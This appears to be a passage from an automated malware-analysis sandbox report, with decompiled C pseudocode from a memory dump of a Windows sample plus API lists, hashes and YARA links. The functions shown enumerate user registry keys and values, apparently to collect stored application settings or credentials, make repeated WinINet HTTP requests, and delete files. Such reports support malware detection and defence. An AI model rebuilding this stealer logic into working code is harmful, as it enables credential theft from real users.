									_t139 = E00416420( *(_t143 + 0x1c), _t143 + 0x110, _t143 + 0x38, 0xff);
									if(_t139 != 0xffffffff && _t139 != 0) {
										_t122 = _t143 + 0x110;
										_t96 = _t93 + 0x1fe;
										_t128 = E00416420( *(_t143 + 0x10), _t143 + 0x110, _t143 + 0x60, 0xff);
										if(_t128 != 0xffffffff && _t128 != 0) {
											_t84 = E00416420( *(_t143 + 0x18), _t143 + 0x110, _t143 + 0x4c, 0xff);
											 *((intOrPtr*)(_t143 + 0x14)) = _t84;
											if(_t84 != 0xffffffff && _t84 != 0 && E00421F60(_t122, _t142, _t128 + _t139) > 0) {
												_t130 = E00416580( *(_t143 + 0x10), _t143 + 0x10c, _t143 + 0x70);
												if(_t130 < 1 || _t130 > 0xffff) {
													_t130 = 0x15;
												}
												E00424100(0x55, _t143 + 0x88);
												_push(_t130);
												_push( *(_t143 + 0x18));
												_push(_t142);
												_push(_t96);
												_t37 = _t142 + 0x1fe; // 0x5fa
												_t90 = E00411D10( *(_t143 + 0x18), 0x311, _t37, _t143 + 0x88);
												_t143 = _t143 + 0x14;
												if(_t90 > 0) {
													_t38 = _t142 + 0x1fe; // 0x5fa
													if(E00410D70(_t143 + 0x20, _t38, _t90) != 0) {
														 *((intOrPtr*)(_t143 + 0x20)) =  *((intOrPtr*)(_t143 + 0x20)) + 1;
													}
												}
											}
										}
									}
									_t137 =  *(_t143 + 0x28);
									 *((intOrPtr*)(_t143 + 0x34)) = 0x104;
									_t79 = RegEnumKeyExW( *(_t143 + 0x10), _t137, _t143 + 0x11c, _t143 + 0x24, 0, 0, 0, 0);
									_t93 =  *(_t143 + 0x18);
								} while (_t79 == 0);
								_t127 =  *(_t143 + 0x24);
							}
							RegCloseKey( *(_t143 + 0x10));
						}
						_t127 = _t127 + 1;
						 *(_t143 + 0x24) = _t127;
					} while (_t127 < 2);
					_t57 = HeapFree( *0x42e6d4, 0, _t93);
				}
				if( *((intOrPtr*)(_t143 + 0x20)) <= 0) {
					_t57 =  *(_t143 + 0x1c);
					if(_t57 != 0) {
						return HeapFree( *0x42e6d4, 0, _t57);
					}
					goto L30;
				} else {
					_t126 =  *(_t143 + 0x1c);
					if(_t126 == 0) {
						L30:
						return _t57;
					} else {
						if( *_t126 != 0) {
							E00424100(0x8f, _t143 + 0x310);
							E0040D880(_t126, 0xcb, _t143 + 0x310);
						}
						return HeapFree( *0x42e6d4, 0, _t126);
					}
				}
			}

0x00422063
0x00422076
0x0042207c
0x0042207e
0x00422084
0x00422096
0x0042209e
0x004220a6
0x004220a6
0x004220ac
0x004220ba
0x004220c8
0x004220d6
0x004220e4
0x004220e9
0x004220eb
0x004220f0
0x0042210e
0x00422118
0x0042212d
0x0042213d
0x00422143
0x0042215c
0x00422165
0x0042216a
0x00422186
0x0042218d
0x0042219b
0x004221a0
0x004221c6
0x004221cb
0x004221d2
0x00422202
0x00422207
0x00422211
0x00422211
0x00422222
0x0042222b
0x0042222c
0x0042222d
0x00422230
0x00422237
0x0042223d
0x00422242
0x00422247
0x0042224a
0x0042225b
0x0042225d
0x0042225d
0x0042225b
0x00422247
0x004221d2
0x004221a0
0x00422261
0x00422280
0x00422288
0x0042228e
0x00422292
0x0042229a
0x0042229a
0x004222a3
0x004222a3
0x004222a9
0x004222aa
0x004222ae
0x004222c6
0x004222c6
0x004222d5
0x0042231c
0x00422322
0x00000000
0x0042232d
0x00000000
0x004222d7
0x004222d7
0x004222dd
0x00422339
0x00422339
0x004222df
0x004222e3
0x004222f1
0x00422300
0x00422300
0x0042231b
0x0042231b
0x004222dd

APIs

HeapAlloc.KERNEL32(?,00000008,00000C20,?,00000000,00000008,?,00000000), ref: 00422076
RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?), ref: 00422106
RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00422135
RegCloseKey.ADVAPI32(?), ref: 004222A3

Part of subcall function 00416420: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,00000000,?,00000000,00000000,?,004106E6,?,?,00000104,?,00000000), ref: 00416448
Part of subcall function 00416420: RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00416469
Part of subcall function 00416420: RegCloseKey.ADVAPI32(?,?,00000000), ref: 0041647B

RegEnumKeyExW.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 00422288

Part of subcall function 00416420: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 004164DB
Part of subcall function 00416420: HeapFree.KERNEL32(?,00000000,00000000,?,?,00000000), ref: 004164F5

Part of subcall function 00416580: RegOpenKeyExW.ADVAPI32 ref: 004165A6
Part of subcall function 00416580: RegQueryValueExW.ADVAPI32(00000001,00000004,00000000,80000001,00000000,?), ref: 004165CB
Part of subcall function 00416580: RegCloseKey.ADVAPI32(?), ref: 004165DD

HeapFree.KERNEL32(?,00000000,00000000), ref: 004222C6
HeapFree.KERNEL32(?,00000000,?), ref: 0042230F
HeapFree.KERNEL32(?,00000000,?), ref: 0042232D

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$CloseOpen$EnumQueryValue$AllocEnvironmentExpandStrings
String ID:
API String ID: 4155870178-0
Opcode ID: 0e493998c060e2cd69c66f39761af7947f561dc338771a916f8c479dac1d332f
Instruction ID: 89d1e862645c9b6fd1dd19b5bf4ac953a6e4a55b2cd61b793e336686fc210f94
Opcode Fuzzy Hash: 0e493998c060e2cd69c66f39761af7947f561dc338771a916f8c479dac1d332f
Instruction Fuzzy Hash: C2710A31704321ABD320DB55ED45FAB77E9FBC8704F40092EBA4497290DB78E945CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00422750, Relevance: 12.2, APIs: 8, Instructions: 210
memoryregistryCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00422750() {
				void* __ebx;
				void* __esi;
				void* _t53;
				intOrPtr _t73;
				intOrPtr _t77;
				intOrPtr _t80;
				void* _t86;
				void* _t90;
				void* _t122;
				void* _t123;
				int _t130;
				void* _t134;
				void* _t135;

				E00410870(_t135 + 0x20, _t135 + 0x20, 0, 8);
				_t53 = HeapAlloc( *0x42e6d4, 8, 0xc20);
				_t134 = _t53;
				if(_t134 == 0) {
					L27:
					return _t53;
				} else {
					_t2 = _t134 + 0x3fc; // 0x3fc
					_t3 = _t2 + 0x1fe; // 0x5fa
					 *((intOrPtr*)(_t135 + 0x20)) = _t2;
					 *(_t135 + 0x24) = _t3;
					E00424100(0x97, _t135 + 0x80);
					E00424100(0x98, _t135 + 0x40);
					E00424100(0x99, _t135 + 0x4c);
					E00424100(0x9a, _t135 + 0x34);
					E00424100(0x9b, _t135 + 0x2c);
					if(RegOpenKeyExW(0x80000001, _t135 + 0x8c, 0, 8, _t135 + 0x10) == 0) {
						_t130 = 0;
						 *((intOrPtr*)(_t135 + 0x34)) = 0x104;
						if(RegEnumKeyExW( *(_t135 + 0x10), 0, _t135 + 0xd4, _t135 + 0x24, 0, 0, 0, 0) == 0) {
							goto L5;
							L18:
							_t130 =  *(_t135 + 0x28);
							 *((intOrPtr*)(_t135 + 0x34)) = 0x104;
							if(RegEnumKeyExW( *(_t135 + 0x10), _t130, _t135 + 0xd4, _t135 + 0x24, 0, 0, 0, 0) == 0) {
								_t121 =  *((intOrPtr*)(_t135 + 0x20));
								L5:
								 *((intOrPtr*)(_t135 + 0x34)) = _t130 + 1;
								_t73 = E00416420( *((intOrPtr*)(_t135 + 0x1c)), _t135 + 0xc8, _t135 + 0x44, 0xff);
								 *((intOrPtr*)(_t135 + 0x14)) = _t73;
								if(_t73 != 0xffffffff && _t73 != 0) {
									_t26 = _t134 + 0x1fe; // 0x1fe
									_t90 = _t26;
									_t77 = E00416420( *(_t135 + 0x10), _t135 + 0xc8, _t135 + 0x38, 0xff);
									 *((intOrPtr*)(_t135 + 0x14)) = _t77;
									if(_t77 != 0xffffffff && _t77 != 0) {
										_t80 = E00416420( *(_t135 + 0x18), _t135 + 0xc8, _t135 + 0x30, 0xff);
										 *((intOrPtr*)(_t135 + 0x14)) = _t80;
										if(_t80 != 0xffffffff && _t80 != 0 && E004212F0(_t121) > 0) {
											_t123 = E00416580( *(_t135 + 0x10), _t135 + 0xc4, _t135 + 0x4c);
											if(_t123 < 1 || _t123 > 0xffff) {
												_t123 = 0x15;
											}
											E00424100(0x55, _t135 + 0x58);
											_push(_t123);
											_push(_t134);
											_push( *((intOrPtr*)(_t135 + 0x20)));
											_t133 =  *((intOrPtr*)(_t135 + 0x30));
											_push(_t90);
											_t86 = E00411D10( *((intOrPtr*)(_t135 + 0x20)), 0x311,  *((intOrPtr*)(_t135 + 0x30)), _t135 + 0x58);
											_t135 = _t135 + 0x14;
											if(_t86 > 0 && E00410D70(_t135 + 0x1c, _t133, _t86) != 0) {
												 *((intOrPtr*)(_t135 + 0x1c)) =  *((intOrPtr*)(_t135 + 0x1c)) + 1;
											}
										}
									}
								}
								goto L18;
							}
						}
						RegCloseKey( *(_t135 + 0x10));
					}
					_t53 = HeapFree( *0x42e6d4, 0, _t134);
					if( *((intOrPtr*)(_t135 + 0x1c)) <= 0) {
						_t53 =  *(_t135 + 0x18);
						if(_t53 != 0) {
							return HeapFree( *0x42e6d4, 0, _t53);
						}
						goto L27;
					} else {
						_t122 =  *(_t135 + 0x18);
						if(_t122 == 0) {
							goto L27;
						} else {
							if( *_t122 != 0) {
								E00424100(0x9c, _t135 + 0x2c8);
								E0040D880(_t122, 0xcb, _t135 + 0x2c8);
							}
							return HeapFree( *0x42e6d4, 0, _t122);
						}
					}
				}
			}

0x00422763
0x00422776
0x0042277c
0x00422780
0x00422a0d
0x00422a0d
0x00422786
0x00422786
0x0042278c
0x0042279e
0x004227a2
0x004227a6
0x004227b4
0x004227c2
0x004227d0
0x004227de
0x00422801
0x0042280b
0x00422820
0x00422830
0x00422836
0x00422953
0x00422953
0x00422972
0x00422982
0x00422840
0x00422844
0x0042285d
0x00422861
0x00422866
0x0042286d
0x00422890
0x00422890
0x00422899
0x0042289e
0x004228a5
0x004228cb
0x004228d0
0x004228d7
0x004228fd
0x00422902
0x0042290c
0x0042290c
0x0042291a
0x00422923
0x00422924
0x00422925
0x00422928
0x0042292c
0x00422933
0x00422938
0x0042293d
0x0042294f
0x0042294f
0x0042293d
0x004228d7
0x004228a5
0x00000000
0x0042286d
0x00422982
0x0042298d
0x0042298d
0x004229a2
0x004229a9
0x004229f0
0x004229f6
0x00000000
0x00422a01
0x00000000
0x004229ab
0x004229ab
0x004229b1
0x00000000
0x004229b3
0x004229b7
0x004229c5
0x004229d4
0x004229d4
0x004229ef
0x004229ef
0x004229b1
0x004229a9

APIs

HeapAlloc.KERNEL32(?,00000008,00000C20,?,00000000,00000008,?,00000000), ref: 00422776
RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000), ref: 004227F9
RegEnumKeyExW.ADVAPI32 ref: 00422828
RegEnumKeyExW.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000,?,?,000000FF), ref: 0042297A

Part of subcall function 00416420: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 004164DB
Part of subcall function 00416420: HeapFree.KERNEL32(?,00000000,00000000,?,?,00000000), ref: 004164F5

Part of subcall function 00416580: RegOpenKeyExW.ADVAPI32 ref: 004165A6
Part of subcall function 00416580: RegQueryValueExW.ADVAPI32(00000001,00000004,00000000,80000001,00000000,?), ref: 004165CB
Part of subcall function 00416580: RegCloseKey.ADVAPI32(?), ref: 004165DD

RegCloseKey.ADVAPI32(?), ref: 0042298D
HeapFree.KERNEL32(?,00000000,00000000,?,00000000), ref: 004229A2
HeapFree.KERNEL32(?,00000000,?), ref: 004229E3
HeapFree.KERNEL32(?,00000000,?), ref: 00422A01

Part of subcall function 00416420: RegOpenKeyExW.ADVAPI32(80000002,00000000,00000000,00000001,00000000,?,00000000,00000000,?,004106E6,?,?,00000104,?,00000000), ref: 00416448
Part of subcall function 00416420: RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00416469
Part of subcall function 00416420: RegCloseKey.ADVAPI32(?,?,00000000), ref: 0041647B

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$CloseOpen$EnumQueryValue$AllocEnvironmentExpandStrings
String ID:
API String ID: 4155870178-0
Opcode ID: 03f6088cecbfeec5714b77d56267a313299ccbf426603edb4ee554dc898e5875
Instruction ID: 8dad6c24591735d3f9289526875395141519d00923ea3748f2959b51b13c3e8e
Opcode Fuzzy Hash: 03f6088cecbfeec5714b77d56267a313299ccbf426603edb4ee554dc898e5875
Instruction Fuzzy Hash: 2A71E7713043126BD320DB55ED44FAF77E8EBC4744F44492EBA4497280DBB8E949CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040CB50, Relevance: 12.2, APIs: 8, Instructions: 202
memoryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040CB50(char __edx) {
				intOrPtr _v10;
				char _v352;
				char _v492;
				char _v562;
				char _v616;
				void* _v620;
				char _v624;
				intOrPtr _v628;
				void* __edi;
				void* __esi;
				void* _t55;
				void* _t61;
				void* _t70;
				intOrPtr _t78;
				intOrPtr* _t80;
				intOrPtr* _t82;
				intOrPtr _t83;
				intOrPtr* _t87;
				char* _t90;
				void* _t98;
				intOrPtr _t107;
				intOrPtr _t111;
				intOrPtr _t118;
				intOrPtr _t120;
				void** _t122;
				char _t124;
				char _t132;
				WCHAR* _t134;
				void* _t137;
				intOrPtr* _t139;
				void* _t146;

				_t112 = __edx;
				_t132 = __edx;
				_t90 =  *((intOrPtr*)(__edx + 0x18));
				_v624 = __edx;
				if( *_t90 != 1) {
					if(_t98 != 0) {
						L16:
						_t122 = _t90 + 8;
						_t55 = E004193E0(_t122,  &_v620,  &_v616, _t90 + 0x20);
						if(_t55 == 0 || _v616 <= 0) {
							goto L24;
						} else {
							_t146 = _v620;
							_t55 = E00419090(_t146,  *((intOrPtr*)(_v624 + 0x14)));
							_t137 = _t55;
							if(_t146 != 0) {
								_t55 = HeapFree( *0x42e6d4, 0, _t146);
							}
							if(_t137 == 0) {
								goto L24;
							} else {
								_t124 = _v624;
								_t61 =  *(_t124 + 0x14);
								if(_t61 != 0) {
									HeapFree( *0x42e6d4, 0, _t61);
								}
								 *(_t124 + 0x14) = _t137;
								return 0;
							}
						}
					} else {
						_t122 = _t90 + 8;
						if(_t122 != 0) {
							_t70 =  *_t122;
							if(_t70 != 0xffffffff) {
								FlushFileBuffers(_t70);
								CloseHandle( *_t122);
								 *_t122 = 0xffffffff;
							}
						}
						E0041D1B0( &_v492);
						 *((intOrPtr*)(_t90 + 0x18)) = _v10;
						E00410820(_t90 + 0x20,  &_v352, 0x102);
						_push(_t122);
						_t55 = E00419110(_t90 + 0x122);
						if(_t55 == 0) {
							L24:
							if(_t122 != 0) {
								_t55 =  *_t122;
								if(_t55 != 0xffffffff) {
									FlushFileBuffers(_t55);
									_t55 = CloseHandle( *_t122);
									 *_t122 = 0xffffffff;
								}
							}
							_push(0x80);
							_t134 = _t90 + 0x122;
							 *_t55 = _t55 +  *_t55;
							SetFileAttributesW(_t134, ??);
							DeleteFileW(_t134);
							return 1;
						} else {
							goto L16;
						}
					}
				} else {
					_v628 = E00413650( *0x42edbc);
					E0041A440(__edx,  &_v616);
					_t139 = _t132 + 0x14;
					if(E0040C730(_t112, _t139, 0x2e) == 0) {
						L10:
						return 2;
					} else {
						_t78 =  *((intOrPtr*)( *_t139 + 0x14));
						_t104 = _t78 + 0x14;
						if(_t78 + 0x14 <= _t78 || E00410740(_t104, _t139) == 0) {
							goto L10;
						} else {
							_t118 =  *_t139;
							_t80 =  *((intOrPtr*)(_t118 + 0x14));
							 *_t80 =  *_t80 + _t80;
							_t9 = _t80 + _t118 + 0x10; // 0x10
							 *((intOrPtr*)(_t80 + _t118 + 8)) = 4;
							_t82 = E00410820(_t9,  &_v624, 4);
							_t107 =  *((intOrPtr*)(_t82 + 8)) +  *((intOrPtr*)(_t118 + 0x14)) + 0x10;
							if(_t107 > 0xa00000) {
								goto L10;
							} else {
								 *((intOrPtr*)(_t82 + 0xc)) = 4;
								 *_t82 = 0x2715;
								 *((intOrPtr*)(_t82 + 4)) = 0x20000;
								 *((intOrPtr*)(_t118 + 0x14)) = _t107;
								 *((intOrPtr*)(_t118 + 0x1c)) =  *((intOrPtr*)(_t118 + 0x1c)) + 1;
								_t83 =  *((intOrPtr*)( *_t139 + 0x14));
								_t108 = _t83 + 0x12;
								if(_t83 + 0x12 <= _t83 || E00410740(_t108, _t139) == 0) {
									goto L10;
								} else {
									_t120 =  *_t139;
									 *((intOrPtr*)( *((intOrPtr*)(_t120 + 0x14)) + _t120 + 8)) = 2;
									_t87 = E00410820( *((intOrPtr*)(_t120 + 0x14)) + _t120 + 0x10,  &_v562, 2);
									_t111 =  *((intOrPtr*)(_t120 + 0x14)) +  *((intOrPtr*)(_t87 + 8)) + 0x10;
									if(_t111 > 0xa00000) {
										goto L10;
									} else {
										 *_t87 = 0x2716;
										 *((intOrPtr*)(_t87 + 4)) = 0x20000;
										 *((intOrPtr*)(_t87 + 0xc)) = 2;
										 *((intOrPtr*)(_t120 + 0x1c)) =  *((intOrPtr*)(_t120 + 0x1c)) + 1;
										 *((intOrPtr*)(_t120 + 0x14)) = _t111;
										return 0;
									}
								}
							}
						}
					}
				}
			}

0x0040cb50
0x0040cb5f
0x0040cb61
0x0040cb68
0x0040cb6c
0x0040cc75
0x0040ccd7
0x0040cce4
0x0040ccea
0x0040ccf1
0x00000000
0x0040ccfa
0x0040ccfe
0x0040cd07
0x0040cd0c
0x0040cd10
0x0040cd1c
0x0040cd1c
0x0040cd24
0x00000000
0x0040cd26
0x0040cd26
0x0040cd2a
0x0040cd2f
0x0040cd3a
0x0040cd3a
0x0040cd40
0x0040cd4c
0x0040cd4c
0x0040cd24
0x0040cc77
0x0040cc77
0x0040cc7c
0x0040cc7e
0x0040cc83
0x0040cc86
0x0040cc8f
0x0040cc95
0x0040cc95
0x0040cc83
0x0040cca2
0x0040ccbf
0x0040ccc2
0x0040cccd
0x0040ccce
0x0040ccd5
0x0040cd4d
0x0040cd4f
0x0040cd51
0x0040cd56
0x0040cd59
0x0040cd62
0x0040cd68
0x0040cd68
0x0040cd56
0x0040cd6e
0x0040cd73
0x0040cd77
0x0040cd7a
0x0040cd81
0x0040cd93
0x00000000
0x00000000
0x00000000
0x0040ccd5
0x0040cb72
0x0040cb82
0x0040cb86
0x0040cb8b
0x0040cb9e
0x0040cc69
0x0040cc72
0x0040cba4
0x0040cba6
0x0040cba9
0x0040cbae
0x00000000
0x0040cbc1
0x0040cbc1
0x0040cbc3
0x0040cbc9
0x0040cbd2
0x0040cbd7
0x0040cbda
0x0040cbe5
0x0040cbef
0x00000000
0x0040cbf1
0x0040cbf1
0x0040cbf4
0x0040cbff
0x0040cc02
0x0040cc0a
0x0040cc0f
0x0040cc12
0x0040cc17
0x00000000
0x0040cc22
0x0040cc22
0x0040cc33
0x0040cc36
0x0040cc41
0x0040cc4b
0x00000000
0x0040cc4d
0x0040cc4d
0x0040cc53
0x0040cc56
0x0040cc59
0x0040cc5c
0x0040cc68
0x0040cc68
0x0040cc4b
0x0040cc17
0x0040cbef
0x0040cbae
0x0040cb9e

APIs

FlushFileBuffers.KERNEL32 ref: 0040CC86
CloseHandle.KERNEL32 ref: 0040CC8F
HeapFree.KERNEL32(?,00000000,?), ref: 0040CD1C
HeapFree.KERNEL32(?,00000000,?), ref: 0040CD3A

Part of subcall function 00413650: GetTickCount.KERNEL32 ref: 004136A2
Part of subcall function 00413650: GetTickCount.KERNEL32 ref: 004136B4
Part of subcall function 00413650: HeapFree.KERNEL32(?,00000000,?,00000000), ref: 004136CF

Part of subcall function 0041A440: RegOpenKeyExW.ADVAPI32 ref: 0041A48E
Part of subcall function 0041A440: HeapFree.KERNEL32(?,00000000,?,00000000,?), ref: 0041A4FD

Part of subcall function 0040C730: HeapAlloc.KERNEL32(?,00000008,00000034), ref: 0040C74E

Part of subcall function 00410740: HeapFree.KERNEL32(?,?,?,0041895B,00000000,00000000,00000000,00000000,0040C6FF,-00002720,00020000,00000000,00000000,?,00000001), ref: 00410752

Part of subcall function 00410740: HeapAlloc.KERNEL32(?,00000008,?,0041895B,00000000,00000000,00000000,00000000,0040C6FF,-00002720,00020000,00000000,00000000,?,00000001), ref: 00410772

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$AllocCountTick$BuffersCloseFileFlushHandleOpen
String ID:
API String ID: 1950039238-0
Opcode ID: b298332df30c5466a94e493a92661b936207d7855c9aad268a29dc88f597f1ed
Instruction ID: c1cbbf4232738d2a663a2cac64dd6acd8ad83b4d8af0c02a7df19a070af2b8a2
Opcode Fuzzy Hash: b298332df30c5466a94e493a92661b936207d7855c9aad268a29dc88f597f1ed
Instruction Fuzzy Hash: 3D610271604201CBC714DF25E8C4AABB7A5FF48314F0406AEF948AB392D735EC85CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 004133B0, Relevance: 12.2, APIs: 8, Instructions: 159
networkmemorysleepCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E004133B0(char* __eax) {
				char _v2;
				intOrPtr _v4;
				void* _v12;
				void* _v16;
				signed int _v20;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v36;
				intOrPtr _v44;
				void* _v48;
				char _v52;
				void* _v56;
				void* _v60;
				char _t51;
				void* _t52;
				void* _t53;
				char _t62;
				int _t66;
				void* _t68;
				intOrPtr _t70;
				char _t72;
				void* _t74;
				signed int _t77;
				void* _t92;
				char* _t94;
				signed int _t96;
				signed int _t97;
				void* _t98;
				void* _t100;

				_t100 =  &_v32;
				_t94 = __eax;
				_v32 = 0;
				if(E004173A0( &_v16,  *((intOrPtr*)(__eax + 0x10))) == 0) {
					return 0;
				} else {
					_t96 =  *(_t94 + 0x24);
					if(_v2 != 2) {
						_t97 = _t96 & 0xfffffffb;
					} else {
						_t97 = _t96 | 0x00000004;
					}
					_t51 = 0;
					_v20 = _t97;
					_v29 = 0;
					if( *((intOrPtr*)(_t94 + 1)) > 0) {
						do {
							if(_t51 == 0) {
								L10:
								_t77 =  *(_t94 + 0x14);
								_v30 = 1;
								if( *_t94 != 0) {
									_t77 = _t77 | 0x00000001;
									_v30 = 2;
								}
								_v31 = 0;
								if(_v30 > 0) {
									do {
										if(_v31 == 1) {
											_t77 = _t77 & 0xfffffffe;
										}
										_t92 = E00412FC0(_t77,  *((intOrPtr*)(_t94 + 0xc)), _v16, _v4);
										if(_t92 == 0) {
											goto L27;
										} else {
											_t98 = E004130B0(_t97, _t92, _v12,  *((intOrPtr*)(_t94 + 0x1c)),  *((intOrPtr*)(_t94 + 0x20)));
											if(_t98 != 0) {
												_t70 =  *((intOrPtr*)(_t94 + 0x2c));
												_push( *(_t94 + 8));
												if(_t70 == 0) {
													_t72 = E00413180(_t98,  *((intOrPtr*)(_t100 + 0x38)),  *((intOrPtr*)(_t94 + 0x28)));
												} else {
													_push( *((intOrPtr*)(_t94 + 0x28)));
													_push(_t70);
													_push(_t98);
													_t72 = E004132A0();
												}
												_v36 = _t72;
												InternetCloseHandle(_t98);
											}
											 *(_t100 + 0x24) = 0;
											 *((intOrPtr*)(_t100 + 0x28)) = 4;
											_t66 = InternetQueryOptionA(_t92, 0x15, _t100 + 0x18, _t100 + 0x18);
											InternetCloseHandle(_t92);
											if(_t66 != 0) {
												_t68 = _v48;
												if(_t68 != 0 && _v44 == 4) {
													InternetCloseHandle(_t68);
												}
											}
											if(_v52 == 0) {
												_t97 =  *(_t100 + 0x1c);
												goto L27;
											}
										}
										goto L29;
										L27:
										_t62 = _v31 + 1;
										_v31 = _t62;
									} while (_t62 < _v30);
								}
								goto L28;
							} else {
								_t74 =  *(_t94 + 8);
								if(_t74 == 0) {
									Sleep( *(_t94 + 4));
									goto L10;
								} else {
									if(WaitForSingleObject(_t74,  *(_t94 + 4)) == 0x102) {
										goto L10;
									}
								}
							}
							goto L29;
							L28:
							_t51 = _v29 + 1;
							_v29 = _t51;
						} while (_t51 <  *((intOrPtr*)(_t94 + 1)));
					}
					L29:
					_t52 = _v16;
					if(_t52 != 0) {
						HeapFree( *0x42e6d4, 0, _t52);
					}
					_t53 = _v12;
					if(_t53 != 0) {
						HeapFree( *0x42e6d4, 0, _t53);
					}
					return _v32;
				}
			}

0x004133b0
0x004133b6
0x004133c2
0x004133cd
0x0041357a
0x004133d3
0x004133d8
0x004133db
0x004133e2
0x004133dd
0x004133dd
0x004133dd
0x004133e5
0x004133e7
0x004133eb
0x004133f2
0x004133f8
0x004133fa
0x00413425
0x00413428
0x0041342b
0x00413430
0x00413432
0x00413435
0x00413435
0x0041343f
0x00413444
0x0041344a
0x0041344f
0x00413451
0x00413451
0x00413468
0x0041346c
0x00000000
0x00413472
0x00413487
0x0041348b
0x0041348d
0x00413493
0x00413496
0x004134af
0x00413498
0x0041349b
0x0041349c
0x0041349d
0x0041349e
0x0041349e
0x004134b5
0x004134b9
0x004134b9
0x004134cc
0x004134d4
0x004134dc
0x004134eb
0x004134ef
0x004134f1
0x004134f7
0x00413501
0x00413501
0x004134f7
0x00413508
0x0041350a
0x00000000
0x0041350a
0x00413508
0x00000000
0x0041350e
0x00413512
0x00413514
0x00413518
0x0041344a
0x00000000
0x004133fc
0x004133fc
0x00413401
0x0041341f
0x00000000
0x00413403
0x00413413
0x00000000
0x00413419
0x00413413
0x00413401
0x00000000
0x00413522
0x00413526
0x00413528
0x0041352c
0x004133f8
0x00413535
0x00413535
0x00413541
0x0041354d
0x0041354d
0x0041354f
0x00413555
0x00413561
0x00413561
0x0041356e
0x0041356e

APIs

Part of subcall function 004173A0: InternetCrackUrlA.WININET(?,00000000,00000000), ref: 004173D7

WaitForSingleObject.KERNEL32(?,?), ref: 00413408
Sleep.KERNEL32(?), ref: 0041341F

Part of subcall function 00413180: WaitForSingleObject.KERNEL32(?,00000000,00000000,?,?,?,?,0040D43D,00000000,?,00000000,?,?,?,?,00000000), ref: 004131BB
Part of subcall function 00413180: HeapFree.KERNEL32(?,00001000,00000000,00000000,?,?,?,?,0040D43D,00000000,?,00000000,?,?,?), ref: 004131EA
Part of subcall function 00413180: InternetReadFile.WININET(?,?,00001000,00001000), ref: 00413232
Part of subcall function 00413180: HeapFree.KERNEL32(?,00000000,00000000,?,00000000,?,00000001,?), ref: 0041325A

InternetCloseHandle.WININET(00000000), ref: 004134B9
InternetQueryOptionA.WININET(00000000,00000015,?,?), ref: 004134DC
InternetCloseHandle.WININET(00000000), ref: 004134EB
InternetCloseHandle.WININET(?), ref: 00413501
HeapFree.KERNEL32(?,00000000,?), ref: 0041354D
HeapFree.KERNEL32(?,00000000,?), ref: 00413561

Memory Dump Source

Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$FreeHeap$CloseHandle$ObjectSingleWait$CrackFileOptionQueryReadSleep
String ID:
API String ID: 3595247247-0
Opcode ID: 1d978f567b27c13991d58637c3d4bb2e2338899e20ce9ca14f3995359dccaf46
Instruction ID: b1d53459dc8ff9143f2361245a2de75d1bd653708507c77510e4428d2edc6376
Opcode Fuzzy Hash: 1d978f567b27c13991d58637c3d4bb2e2338899e20ce9ca14f3995359dccaf46
Instruction Fuzzy Hash: 1F51F775108385AFD321DF29D840BABBBE9AF85704F04495EF8D583341C678EE89C76A

Uniqueness

Uniqueness Score: -1.00%

Function 00419110, Relevance: 12.1, APIs: 8, Instructions: 135
fileCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E00419110(WCHAR* __eax) {
				void* _t21;
				signed int _t26;
				signed int _t27;
				signed int _t29;
				void* _t30;
				signed int _t35;
				union _LARGE_INTEGER _t37;
				int _t38;
				int _t40;
				long _t41;
				struct _OVERLAPPED* _t42;
				signed int _t44;
				struct _OVERLAPPED* _t59;
				void** _t61;
				void* _t62;

				_t61 =  *(_t62 + 0x24);
				_t41 = 0;
				_t21 = CreateFileW(__eax, 0xc0000000, 1, 0, 4, 0x80, 0);
				 *_t61 = _t21;
				if(_t21 == 0xffffffff) {
					L5:
					return _t41;
				} else {
					__imp__GetFileSizeEx(_t21, _t62 + 0x18);
					if(_t21 == 0) {
						L18:
						CloseHandle( *_t61);
						 *_t61 = 0xffffffff;
						__eflags = 0;
						return 0;
					} else {
						_t26 =  *(_t62 + 0x18);
